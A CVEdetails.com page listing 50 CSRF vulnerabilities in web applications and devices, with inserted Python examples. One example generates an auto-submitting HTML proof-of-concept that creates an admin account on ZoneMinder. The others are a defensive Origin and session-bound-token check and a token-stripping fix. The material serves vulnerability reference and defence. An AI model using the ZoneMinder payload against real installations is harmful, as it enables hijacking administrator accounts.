CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities (CSRF)

Columns (each entry below spans four lines): line 1: # | CVE ID | CWE ID | Vulnerability Type(s) | Publish Date | Update Date (the "# of Exploits" column is empty for every entry on this page); line 2: CVSS Score; line 3: Gained Access Level | Access | Complexity | Authentication | Conf. | Integ. | Avail.; line 4: description.
1 CVE-2017-7178 352 CSRF 2017-03-18 2017-03-24
6.8
None Remote Medium Not required Partial Partial Partial
CSRF was discovered in the web UI in Deluge before 1.3.14. The exploitation methodology involves (1) hosting a crafted plugin that executes an arbitrary program from its __init__.py file and (2) causing the victim to download, install, and enable this plugin.
2 CVE-2017-6918 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.2.16 with the value[#][*] parameter to the admin/settings/update/ page. The Navigation Social can be changed.
3 CVE-2017-6917 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.2.16 with the value parameter to the admin/settings/update/ page. The Colophon can be changed.
4 CVE-2017-6916 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.1.18 with the nav-social[#] parameter to the admin/settings/update/ page. The Navigation Social can be changed.
5 CVE-2017-6915 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.1.18 with the colophon parameter to the admin/settings/update/ page. The Colophon can be changed.
6 CVE-2017-6914 352 CSRF 2017-03-15 2017-03-16
5.8
None Remote Medium Not required None Partial Partial
CSRF exists in BigTree CMS 4.1.18 and 4.2.16 with the id parameter to the admin/ajax/users/delete/ page. A user can be deleted.
7 CVE-2017-6819 352 CSRF 2017-03-11 2017-03-14
4.3
None Remote Medium Not required None None Partial
In WordPress before 4.7.3, there is cross-site request forgery (CSRF) in Press This (wp-admin/includes/class-wp-press-this.php), leading to excessive use of server resources. The CSRF can trigger an outbound HTTP request for a large file that is then parsed by Press This.
8 CVE-2017-6803 352 Exec Code CSRF 2017-03-20 2017-03-23
6.8
None Remote Medium Not required Partial Partial Partial
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface in the Scheduler in SolarWinds (formerly Serv-U) FTP Voyager 16.2.0 allow remote attackers to hijack the authentication of users for requests that (1) change the admin password, (2) terminate the scheduler, or (3) possibly execute arbitrary commands via crafted requests to Admin/XML/Result.xml.
9 CVE-2017-6411 352 CSRF 2017-03-06 2017-03-07
6.8
None Remote Medium Not required Partial Partial Partial
Cross Site Request Forgery (CSRF) on D-Link DSL-2730U C1 IN_1.00 devices allows remote attackers to change the DNS or firewall configuration or any password.
10 CVE-2017-6379 352 CSRF 2017-03-16 2017-03-17
5.1
None Remote High Not required Partial Partial Partial
Some administrative paths in Drupal 8.2.x before 8.2.7 did not include protection for CSRF. This would allow an attacker to disable some blocks on a site. This issue is mitigated by the fact that users would have to know the block ID.
11 CVE-2017-6366 Exec Code CSRF 2017-03-15 2017-03-15
0.0 (CVSS score not yet assigned)
None (remaining CVSS vector fields not yet available)
Cross-site request forgery (CSRF) vulnerability in NETGEAR DGN2200 routers with firmware 10.0.0.20 through 10.0.0.50 allows remote attackers to hijack the authentication of users for requests that perform DNS lookups via the host_name parameter to dnslookup.cgi. NOTE: this issue can be combined with CVE-2017-6334 to execute arbitrary code remotely.
12 CVE-2017-6180 352 CSRF 2017-03-13 2017-03-14
6.8
None Remote Medium Not required Partial Partial Partial
Keekoon KK002 devices 1.8.12 HD have a Cross Site Request Forgery Vulnerability affecting goform/formChnUserPwd and goform/formUserMng (and the entire set of other pages).
13 CVE-2017-6127 352 CSRF 2017-02-21 2017-03-01
6.8
None Remote Medium Not required Partial Partial Partial
Multiple cross-site request forgery (CSRF) vulnerabilities in the access portal on the DIGISOL DG-HR1400 Wireless Router with firmware 1.00.02 allow remote attackers to hijack the authentication of administrators for requests that (1) change the SSID, (2) change the Wi-Fi password, or (3) possibly have unspecified other impact via crafted requests to form2WlanBasicSetup.cgi.
14 CVE-2017-6081 352 CSRF 2017-03-13 2017-03-17
6.8
None Remote Medium Not required Partial Partial Partial
A CSRF issue was discovered in Zammad before 1.0.4, 1.1.x before 1.1.3, and 1.2.x before 1.2.1. To exploit the vulnerability, an attacker can send cross-domain requests directly to the REST API for users with a valid session cookie.
15 CVE-2017-6069 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5 has CSRF in admin/blog/add/. The attacker can add any tag, and can optionally insert XSS via the tags parameter.
16 CVE-2017-6068 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5 has CSRF in admin/blocks/add/. The attacker can create any block, and can optionally insert XSS via the content parameter.
17 CVE-2017-6066 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5 has CSRF in admin/languages/edit/1/. The attacker can perform any Edit Language action, and can optionally insert XSS via the title parameter.
18 CVE-2017-6002 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5.10 has CSRF in admin/blog/add/. The attacker can add any blog entry, and can optionally insert XSS into that entry via the body parameter.
19 CVE-2017-5959 264 Bypass CSRF 2017-02-21 2017-02-23
7.5
None Remote Low Not required Partial Partial Partial
CSRF token bypass in GeniXCMS before 1.0.2 could result in escalation of privileges. The forgotpassword.php page can be used to acquire a token.
20 CVE-2017-5874 352 XSS Bypass CSRF 2017-03-22 2017-03-23
6.8
None Remote Medium Not required Partial Partial Partial
CSRF exists on D-Link DIR-600M Rev. Cx devices before v3.05ENB01_beta_20170306. This can be used to bypass authentication and insert XSS sequences or possibly have unspecified other impact.
21 CVE-2017-5633 352 CSRF 2017-03-06 2017-03-09
8.5
None Remote Medium Single system Complete Complete Complete
Multiple cross-site request forgery (CSRF) vulnerabilities on the D-Link DI-524 Wireless Router with firmware 9.01 allow remote attackers to (1) change the admin password, (2) reboot the device, or (3) possibly have unspecified other impact via crafted requests to CGI programs.
22 CVE-2017-5492 352 CSRF 2017-01-14 2017-01-18
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the widget-editing accessibility-mode feature in WordPress before 4.7.1 allows remote attackers to hijack the authentication of unspecified victims for requests that perform a widgets-access action, related to wp-admin/includes/class-wp-screen.php and wp-admin/widgets.php.
23 CVE-2017-5489 352 CSRF 2017-01-14 2017-01-18
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in WordPress before 4.7.1 allows remote attackers to hijack the authentication of unspecified victims via vectors involving a Flash file upload.
24 CVE-2017-5476 352 CSRF 2017-01-14 2017-01-25
6.8
None Remote Medium Not required Partial Partial Partial
Serendipity through 2.0.5 allows CSRF for the installation of an event plugin or a sidebar plugin.
25 CVE-2017-5475 352 CSRF 2017-01-14 2017-01-25
6.8
None Remote Medium Not required Partial Partial Partial
comment.php in Serendipity through 2.0.5 allows CSRF in deleting any comments.
26 CVE-2017-5473 352 CSRF 2017-01-14 2017-01-26
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in ntopng through 2.4 allows remote attackers to hijack the authentication of arbitrary users, as demonstrated by admin/add_user.lua, admin/change_user_prefs.lua, admin/delete_user.lua, and admin/password_reset.lua.
27 CVE-2017-5368 352 CSRF 2017-02-06 2017-02-09
6.8
None Remote Medium Not required Partial Partial Partial
ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross-Site Request Forgery), which allows a remote attacker to make changes to the web application as the currently logged-in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user, uid=0, newUser[Username]=attacker1, newUser[Password]=Password1234, conf_password=Password1234 and newUser[System]=Edit (among others).
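Entry 27 above lists the URL and the request parameters that create an admin user. The usual way to verify a CSRF finding like this is a page that auto-submits exactly that request from a foreign origin, so the victim's browser attaches its session cookie. The generator below is an added example, not ZoneMinder's or CVEdetails' code; it uses the parameters the entry gives, and the host name zm.example is an assumption.

```python
"""Build a self-submitting HTML CSRF proof-of-concept page.

Added example, not code from any vendor listed on this page. The form
parameters are the ones entry 27 (CVE-2017-5368) lists for ZoneMinder;
the host name "zm.example" is an assumption.
"""
import html
from typing import Mapping


def build_csrf_poc(action_url: str, params: Mapping[str, str], method: str = "POST") -> str:
    """Return an HTML page that submits `params` to `action_url` as soon as it loads.

    The victim's browser attaches its cookies for action_url's origin to this
    request; if the application then performs the action, it does not tie the
    request to the user's intent (no token, no Origin check). Names and values
    are HTML-escaped so a value containing a quote or a tag cannot break out
    of its attribute and change the form.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in params.items()
    )
    return f"""<!DOCTYPE html>
<html><body>
  <form id="csrf" method="{method}" action="{html.escape(action_url, quote=True)}">
{inputs}
  </form>
  <script>document.getElementById("csrf").submit();</script>
</body></html>
"""


# Constructed from the parameters in entry 27; "zm.example" is an assumed host.
ZONEMINDER_PARAMS = {
    "action": "user",
    "uid": "0",
    "newUser[Username]": "attacker1",
    "newUser[Password]": "Password1234",
    "conf_password": "Password1234",
    "newUser[System]": "Edit",
}


def zoneminder_poc() -> str:
    """The PoC page for the request described in entry 27."""
    return build_csrf_poc("http://zm.example/zm/index.php", ZONEMINDER_PARAMS)


if __name__ == "__main__":
    print(zoneminder_poc())
```

Host the output on any origin the victim can be lured to and check, as the logged-in admin, whether a user named attacker1 appears afterwards; a fixed version should reject the request because it carries no valid anti-CSRF token.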
28 CVE-2017-5169 352 Exec Code CSRF 2017-02-13 2017-02-28
5.1
None Remote High Not required Partial Partial Partial
An issue was discovered in Hanwha Techwin Smart Security Manager Versions 1.5 and prior. Multiple Cross Site Request Forgery vulnerabilities have been identified. The flaws exist within the Redis and Apache Felix Gogo servers that are installed as part of this product. By issuing specific HTTP POST requests, an attacker can gain system-level access to a remote shell session. These vulnerabilities can allow for remote code execution.
29 CVE-2017-5165 352 CSRF 2017-02-13 2017-02-16
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. There is no CSRF Token generated per page and/or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.
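Entries 14, 19 and 29 describe three ways the same defence fails: a cookie-authenticated REST API that accepts cross-domain requests (14), a CSRF token that is not bound to the session, so one obtained from an unauthenticated page works for any user (19), and no token at all per sensitive function (29). The check below is an added example, not code from Zammad, GeniXCMS, BINOM3 or CVEdetails; it combines an Origin/Referer check with a session-bound token. Header names, the secret, the session ids and the hosts are assumptions.

```python
"""Server-side CSRF check: Origin/Referer validation plus a session-bound token.

Added example, not code from any project on this page. Illustrative names
throughout: the X-CSRF-Token header, the session ids, the hosts and the secret
are all assumptions.
"""
import hashlib
import hmac
from typing import Mapping, Optional
from urllib.parse import urlsplit

SAFE_METHODS = frozenset({"GET", "HEAD", "OPTIONS"})


def csrf_token(session_id: str, secret: bytes) -> str:
    """Derive the token from the session so it is useless under another session.

    A token fetched under the attacker's own (or an anonymous) session fails
    verification against the victim's session, which closes the bypass
    described in entry 19.
    """
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(headers: Mapping[str, str]) -> Optional[str]:
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def is_csrf_safe(method: str, headers: Mapping[str, str], session_id: str,
                 secret: bytes, site_origin: str) -> bool:
    """Decide whether a cookie-authenticated request may perform a state change.

    Safe methods pass. For everything else both checks must hold:
    1. the request's Origin (or Referer) equals the site's own origin; a
       request carrying neither header is rejected rather than guessed at;
    2. the X-CSRF-Token header equals the token derived from this session.
    """
    if method.upper() in SAFE_METHODS:
        return True
    origin = _origin_of(headers)
    if origin is None or origin.lower() != site_origin.lower():
        return False
    presented = headers.get("X-CSRF-Token", "")
    expected = csrf_token(session_id, secret)
    return hmac.compare_digest(presented.encode(), expected.encode())


# Constructed sample requests; hosts, session ids and secret are assumptions.
SECRET = b"server-side-secret-rotated-out-of-band"
SITE = "https://helpdesk.example"


def demo() -> dict:
    """Run the check over one request of each kind and return the verdicts."""
    victim = "sess-4f1c"
    good_token = csrf_token(victim, SECRET)
    attacker_token = csrf_token("sess-anon", SECRET)  # obtained under the attacker's own session
    return {
        # Cross-domain page posting to the REST API with the victim's cookie (entry 14).
        "cross_origin": is_csrf_safe("POST", {"Origin": "https://attacker.example"}, victim, SECRET, SITE),
        # Token harvested under another session and replayed (entry 19).
        "foreign_token": is_csrf_safe("POST", {"Origin": SITE, "X-CSRF-Token": attacker_token}, victim, SECRET, SITE),
        # Client that sends neither Origin nor Referer: fail closed.
        "no_origin": is_csrf_safe("DELETE", {"X-CSRF-Token": good_token}, victim, SECRET, SITE),
        # Legitimate same-origin requests from the application's own front end.
        "legit": is_csrf_safe("POST", {"Origin": SITE, "X-CSRF-Token": good_token}, victim, SECRET, SITE),
        "legit_referer": is_csrf_safe("PUT", {"Referer": SITE + "/users/4", "X-CSRF-Token": good_token}, victim, SECRET, SITE),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:14s} {'allowed' if ok else 'rejected'}")
```

Applying the check to every non-safe method of every endpoint, rather than to selected pages, is what entry 29's "per page and/or per (sensitive) function" wording is asking for.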
30 CVE-2017-5145 352 CSRF 2017-02-13 2017-02-24
7.5
None Remote Low Not required Partial Partial Partial
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Successful exploitation of this CROSS-SITE REQUEST FORGERY (CSRF) vulnerability can allow execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.
31 CVE-2017-3877 352 CSRF 2017-03-17 2017-03-21
4.3
None Remote Medium Not required None Partial None
A vulnerability in the web framework of Cisco Unified Communications Manager (CallManager) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of the web interface of the affected software. More Information: CSCvb70021. Known Affected Releases: 11.5(1.11007.2).
32 CVE-2017-3794 352 CSRF 2017-01-26 2017-01-27
6.8
None Remote Medium Not required Partial Partial Partial
A vulnerability in Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against an administrative user. More Information: CSCuz03317. Known Affected Releases: 2.6. Known Fixed Releases: 2.7.1.12.
33 CVE-2017-2682 352 CSRF 2017-02-27 2017-03-15
6.8
None Remote Medium Not required Partial Partial Partial
The Siemens web application RUGGEDCOM NMS < V1.2 on port 8080/TCP and 8081/TCP could allow a remote attacker to perform a Cross-Site Request Forgery (CSRF) attack, potentially allowing an attacker to execute administrative operations, provided the targeted user has an active session and is induced to trigger a malicious request.
34 CVE-2017-0045 352 +Info CSRF 2017-03-16 2017-03-24
4.3
None Remote Medium Not required Partial None None
Windows DVD Maker in Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, and Windows Vista SP2 does not properly parse crafted .msdvd files, which allows attackers to obtain information to compromise a target system, aka "Windows DVD Maker Cross-Site Request Forgery Vulnerability."
35 CVE-2016-1000213 352 CSRF 2016-10-25 2016-11-07
6.8
None Remote Medium Not required Partial Partial Partial
Ruckus Wireless H500 web management interface CSRF
36 CVE-2016-10206 352 CSRF 2017-03-03 2017-03-07
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack the authentication of users for requests that change passwords and possibly have unspecified other impact as demonstrated by a crafted user action request to index.php.
37 CVE-2016-9975 352 CSRF 2017-02-24 2017-03-01
6.8
None Remote Medium Not required Partial Partial Partial
IBM Jazz for Service Management 1.1.2.1 and 1.1.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 1998714.
38 CVE-2016-9866 352 CSRF 2016-12-10 2016-12-23
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in phpMyAdmin. When the arg_separator is different from its default & value, the CSRF token was not properly stripped from the return URL of the preference import action. All 4.6.x versions (prior to 4.6.5), 4.4.x versions (prior to 4.4.15.9), and 4.0.x versions (prior to 4.0.10.18) are affected.
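Entry 38 describes a token-handling bug that only appears under a non-default configuration: the return URL was cleaned of the CSRF token assuming the query separator was "&", so with any other arg_separator the token stayed in the URL. The functions below are an added example, not phpMyAdmin's code: the naive version reproduces that failure mode and the fixed one takes the separator as input. The parameter name "token", the ";" separator and the URLs are assumptions.

```python
"""Strip a CSRF token from a return URL regardless of the query separator.

Added example, not phpMyAdmin's code. "token" as the parameter name, ";" as
the alternative separator and the sample URLs are assumptions.
"""
from urllib.parse import urlsplit, urlunsplit

TOKEN_PARAM = "token"  # assumed name of the CSRF token parameter


def _strip_param(url: str, name: str, separator: str) -> str:
    """Remove every `name=...` pair from url's query, splitting on `separator`."""
    parts = urlsplit(url)
    kept = [p for p in parts.query.split(separator)
            if p and p.split("=", 1)[0] != name]
    return urlunsplit((parts.scheme, parts.netloc, parts.path, separator.join(kept), parts.fragment))


def strip_token_naive(url: str) -> str:
    """The buggy shape: always assumes "&" separates query arguments."""
    return _strip_param(url, TOKEN_PARAM, "&")


def strip_token(url: str, arg_separator: str = "&") -> str:
    """Separator-aware version: pass the separator the application is configured with."""
    return _strip_param(url, TOKEN_PARAM, arg_separator)


def token_leaks(url: str, arg_separator: str) -> bool:
    """True if the token parameter is still present in url's query."""
    query = urlsplit(url).query
    return any(p.split("=", 1)[0] == TOKEN_PARAM for p in query.split(arg_separator))


# Constructed URLs; host, page and token value are made up.
URL_AMP = "https://db.example/prefs_manage.php?return=index.php&token=a1b2c3d4"
URL_SEMI = "https://db.example/prefs_manage.php?return=index.php;token=a1b2c3d4"

if __name__ == "__main__":
    # With ";" as separator the naive code sees one argument, "return=index.php;token=...",
    # and keeps it, so the token survives in the URL it returns.
    print(strip_token_naive(URL_SEMI))
    print(strip_token(URL_SEMI, arg_separator=";"))
```

The test for this class of bug is to run the application with the non-default separator and check that the token is absent from every URL that ends up in a redirect, a link, a log line or a Referer.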
39 CVE-2016-9730 352 CSRF 2017-03-07 2017-03-09
4.3
None Remote Medium Not required None Partial None
IBM QRadar Incident Forensics 7.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 1999549.
40 CVE-2016-9456 CSRF 2017-03-27 2017-03-27
0.0 (CVSS score not yet assigned)
None (remaining CVSS vector fields not yet available)
Revive Adserver before 3.2.3 suffers from Cross-Site Request Forgery (CSRF). The Revive Adserver team conducted a security audit of the admin interface scripts in order to identify and fix other potential CSRF vulnerabilities. More than 20 such issues were fixed.
41 CVE-2016-9455 CSRF 2017-03-27 2017-03-27
0.0 (CVSS score not yet assigned)
None (remaining CVSS vector fields not yet available)
Revive Adserver before 3.2.3 suffers from Cross-Site Request Forgery (CSRF). A number of scripts in Revive Adserver's user interface are vulnerable to CSRF attacks: `www/admin/banner-acl.php`, `www/admin/banner-activate.php`, `www/admin/banner-advanced.php`, `www/admin/banner-modify.php`, `www/admin/banner-swf.php`, `www/admin/banner-zone.php`, `www/admin/tracker-modify.php`.
42 CVE-2016-9365 352 CSRF 2017-02-13 2017-02-17
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6x50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Requests are not verified to be intentionally submitted by the proper user (CROSS-SITE REQUEST FORGERY).
43 CVE-2016-9218 352 CSRF 2017-01-26 2017-01-27
6.8
None Remote Medium Not required Partial Partial Partial
A vulnerability in Cisco Hybrid Meeting Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against the user of the web interface. More Information: CSCvc28662. Known Affected Releases: 1.0.
44 CVE-2016-9127 CSRF 2017-03-27 2017-03-27
0.0 (CVSS score not yet assigned)
None (remaining CVSS vector fields not yet available)
Revive Adserver before 3.2.3 suffers from Cross-Site Request Forgery (CSRF). The password recovery form in Revive Adserver is vulnerable to CSRF attacks. This vulnerability could be exploited to send a large number of password recovery emails to the registered users, especially in conjunction with a bug that caused recovery emails to be sent to all the users at once. Both issues have been fixed.
45 CVE-2016-8941 352 CSRF 2017-02-01 2017-02-13
6.8
None Remote Medium Not required Partial Partial Partial
IBM Tivoli Storage Productivity Center is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.
46 CVE-2016-8673 352 CSRF 2016-11-23 2017-03-16
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the integrated web server on Siemens SIMATIC CP 343-1 Advanced prior to version 3.0.53, SIMATIC CP 443-1 Advanced prior to version 3.2.17, SIMATIC S7-300 CPU, and SIMATIC S7-400 CPU devices allows remote attackers to hijack the authentication of arbitrary users.
47 CVE-2016-8504 352 CSRF 2016-10-26 2016-12-02
4.3
None Remote Medium Not required Partial None None
CSRF of the synchronization form in Yandex Browser for desktop before version 16.6 could be used by a remote attacker to steal saved data in the browser profile.
48 CVE-2016-8369 352 CSRF 2017-02-13 2017-02-17
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application does not sufficiently verify if a request was intentionally provided by the user who submitted the request (CROSS-SITE REQUEST FORGERY).
49 CVE-2016-8350 352 CSRF 2017-02-13 2017-03-02
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. The web application may not sufficiently verify whether a request was provided by a valid user (CROSS-SITE REQUEST FORGERY).
50 CVE-2016-8201 352 CSRF 2017-01-14 2017-02-02
6.0
None Remote Medium Single system Partial Partial Partial
A CSRF vulnerability in Brocade Virtual Traffic Manager versions released prior to and including 11.0 could allow an attacker to trick a logged-in user into making administrative changes on the traffic manager cluster.
Total number of vulnerabilities: 1401 (this is page 1 of 29)
CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.